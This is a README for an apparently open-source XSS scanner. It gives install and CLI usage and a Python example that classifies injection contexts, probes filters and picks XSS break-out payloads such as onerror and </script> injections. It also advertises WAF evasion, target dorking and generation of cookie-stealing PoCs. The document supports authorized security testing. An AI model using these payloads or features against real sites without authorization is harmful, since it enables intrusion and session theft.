The context-aware XSS scanner — reflected, DOM, stored, blind, and browser-confirmed XSS with WAF evasion, CRLF injection, XST, and PoC generation. No Burp license. Just findings.
```bash
# Kali / Debian / Ubuntu — venv required on externally-managed Python
python3 -m venv .venv && source .venv/bin/activate
pip install stingxss
pip install 'stingxss[browser]'   # + headless browser engine (quoted so zsh does not glob the brackets)
```

Or from source:

```bash
git clone https://github.com/CommonHuman-Lab/stingxss.git
cd stingxss
python3 -m venv .venv && source .venv/bin/activate
pip install -e .
```

Point it at a target. Get findings. Drop it in a pipeline.
Most XSS scanners fire generic payloads and check for reflection. StingXSS goes further at every step:
Context first. Before injecting a single payload, StingXSS classifies exactly where the input lands: inside a `<script>` block, a double-quoted attribute, a template literal, an Angular expression, a CSS value. The payloads sent are chosen for that specific context, not sprayed blindly.
Smarter, not just more. Filter-probing runs automatically on every reflected parameter: one extra request maps which special characters the server encodes or strips, then only payloads that can actually work in that environment are tried. Fewer requests, higher signal.
Confirmed, not assumed. Reflection is a hint. Execution is a finding. The headless Chromium engine intercepts actual `alert()` and `confirm()` calls via the Chrome DevTools Protocol; if the JavaScript didn't run, it's not reported as confirmed.
Finds what HTTP scanners miss. Single-page apps expose routes through hash fragments (`#/search?q=`). StingXSS discovers and tests those. Static DOM analysis (28 sources × 43 sinks) catches DOM XSS without a browser, in any CI environment.
From finding to PoC in one step. `--poc` generates ready-to-use exploitation payloads (cookie-stealers, localStorage exfil, stealth wrappers) for every confirmed finding.
Pipeline-native. JSON output, clean exit codes, a Python API. Drop it into a CI job, chain it with other tools, or call it from a script.
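The two decisions above, context classification and filter probing, as an added worked example written for this page rather than StingXSS's own code. It takes the body returned for a single probe request, labels where the canary landed, records which probe characters came back raw, encoded or stripped, and keeps only the candidate payloads whose required characters survived. The canary, the probe character set, the context labels and the payload table are this example's assumptions, and both sample responses are constructed.

```python
# Context classification + filter probing. Added example, not StingXSS code.
# CANARY, PROBE_CHARS, the context labels and the payload table are assumptions.
import re

CANARY = "zq7xk"              # constructed marker, unlikely to occur naturally
PROBE_CHARS = "<>\"'`()/;="   # characters a payload might need, sent in one request
PROBE = CANARY + PROBE_CHARS + CANARY

# Encoded forms a server may substitute for a probe character (compared lower-case).
ENCODINGS = {
    "<": ["&lt;", "&#x3c;", "\\u003c"], ">": ["&gt;", "&#x3e;", "\\u003e"],
    '"': ["&quot;", "&#x22;", '\\"'],   "'": ["&#x27;", "&#39;", "\\'"],
    "`": ["&#x60;", "\\`"],             "(": ["&#x28;", "\\("],
    ")": ["&#x29;", "\\)"],             "/": ["&#x2f;", "\\/"],
    ";": ["&#x3b;"],                    "=": ["&#x3d;"],
}

# (context prefix, payload, probe characters it needs reflected raw)
CANDIDATES = [
    ("html_text", "<img src=x onerror=alert(1)>", "<>=()"),
    ('attribute_"', '" autofocus onfocus=alert(1) x="', '"=()'),
    ('attribute_"', '"><img src=x onerror=alert(1)>', '"<>=()'),
    ("attribute_'", "' autofocus onfocus=alert(1) x='", "'=()"),
    ("event_handler_attribute", "alert(1)", "()"),
    ("script_string_'", "';alert(1);//", "';()/"),
    ('script_string_"', '";alert(1);//', '";()/'),
    ("script_string_", "</script><img src=x onerror=alert(1)>", "</>=()"),
    ("script_code", "alert(1)", "()"),
]

def _open_quote(text, quotes):
    """Quote char of an unterminated string in text, else '' (honours backslash escapes)."""
    q, i = "", 0
    while i < len(text):
        c, i = text[i], i + 1
        if q and c == "\\":
            i += 1                          # skip the escaped character
        elif q and c == q:
            q = ""
        elif not q and c in quotes:
            q = c
    return q

def classify_context(body, marker):
    """Coarse label for where the first occurrence of marker lands in body."""
    idx = body.find(marker)
    if idx < 0:
        return "not_reflected"
    before, low = body[:idx], body[:idx].lower()
    if low.count("<script") > low.count("</script"):
        js = before[low.rfind("<script"):]
        js = js[js.find(">") + 1:]          # drop the opening tag itself
        q = _open_quote(js, "\"'`")
        return f"script_string_{q}" if q else "script_code"
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt <= gt:
        return "html_text"                  # between tags: a text node
    tag = before[lt:]                       # an unclosed tag: we are inside it
    q = _open_quote(tag, "\"'")
    if not q:
        return "unquoted_attribute" if re.search(r"=\s*[^\s\"'>]*$", tag) else "tag_body"
    m = re.search(r"([\w:-]+)\s*=\s*" + q + "[^" + q + "]*$", tag)
    name = m.group(1).lower() if m else ""
    if name.startswith("on"):
        return "event_handler_attribute"
    return "url_attribute" if name in ("href", "src", "action", "formaction") else f"attribute_{q}"

def probe_filters(body):
    """Map each probe character to 'raw', 'encoded' or 'stripped' from its reflection."""
    low = body.lower()
    start = low.find(CANARY)
    if start < 0:
        return {}
    start += len(CANARY)
    end = low.find(CANARY, start)
    segment = low[start:end if end >= 0 else None]
    result, i = {}, 0
    for c in PROBE_CHARS:
        if segment.startswith(c, i):
            result[c], i = "raw", i + 1
            continue
        for enc in ENCODINGS[c]:
            if segment.startswith(enc.lower(), i):
                result[c], i = "encoded", i + len(enc)
                break
        else:
            result[c] = "stripped"
    return result

def plan(body):
    """One probe response in; (context, filter map, payloads worth sending) out."""
    context, filters = classify_context(body, CANARY), probe_filters(body)
    raw = {c for c, state in filters.items() if state == "raw"}
    payloads = [p for ctx, p, need in CANDIDATES
                if context.startswith(ctx) and set(need) <= raw]
    return context, filters, payloads

def demo_attribute_response():
    """Constructed response: double-quoted attribute, < and > HTML-encoded, quotes untouched."""
    reflected = PROBE.replace("<", "&lt;").replace(">", "&gt;")
    return '<html><body><input type="text" name="q" value="' + reflected + '"></body></html>'

def demo_script_response():
    """Constructed response: single-quoted JS string, quotes backslash-escaped, < > untouched."""
    reflected = PROBE.replace('"', '\\"').replace("'", "\\'")
    return "<html><script>var q = '" + reflected + "';</script></html>"
```

For the constructed attribute response `plan()` reports that `<` and `>` are blocked and only the quote-break payload is worth sending; for the script-string response it reports the quotes as escaped but `</script>` still able to leave the block, so the one payload it keeps is the tag break-out. Those are the requests a blind spray would have buried among dozens of dead ones.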
```bash
stingxss -u "https://target.com/search?q=test"                            # reflected / DOM scan of one parameter
stingxss -u "https://target.com/#/search?q=test" --browser                # hash-fragment route, browser-confirmed
stingxss -u "https://target.com/" --crawl --level 2 -o results.json       # crawl two levels deep, JSON output
stingxss -u "https://target.com/comment" --blind "https://xyz.oast.me"    # blind XSS with an OAST callback host
stingxss -u "https://target.com/search?q=test" --poc                      # generate PoC payloads for confirmed findings
```

Run with no arguments for interactive wizard mode.
Reflected, DOM, stored, blind, and browser-confirmed XSS — plus CRLF injection, XST, CORS misconfigurations, prototype pollution, DOM clobbering, clickjacking, HSTS, SRI, JSONP, open redirects, GraphQL and WebSocket injection, and vulnerable client-side libraries. WAF fingerprinting and evasion built in.
| Topic | Description |
|---|---|
| CLI Flags | All flags, grouped by function |
| Capabilities | Every detection type with details |
| Smart Scanning | Filter probing, scan levels, custom payloads |
| WAF Evasion | Auto-detection, 12 transforms, manual override |
| Authentication | Form login, HTTP auth, OpenAPI, browser crawl |
| Output & Reports | PoC, HTML reports, SARIF, JSON, exit codes |
| Dorking | Target discovery via DuckDuckGo / Bing / Yahoo |
| Browser Engine | Headless Chromium, confirmed execution |
| Python API | Integration and scripting |
| Fire Range | Deliberately vulnerable test lab |
Only run StingXSS against applications you own or have explicit written authorization to test. Authorized use includes penetration testing engagements, bug bounty programs within defined scope, and CTF competitions.
The authors accept no liability for unauthorized or illegal use.
Licensed under the AGPLv3. You are free to use, modify, and distribute this software. If you run it as a service or distribute it, the source must remain open.
For commercial licensing, contact the author.
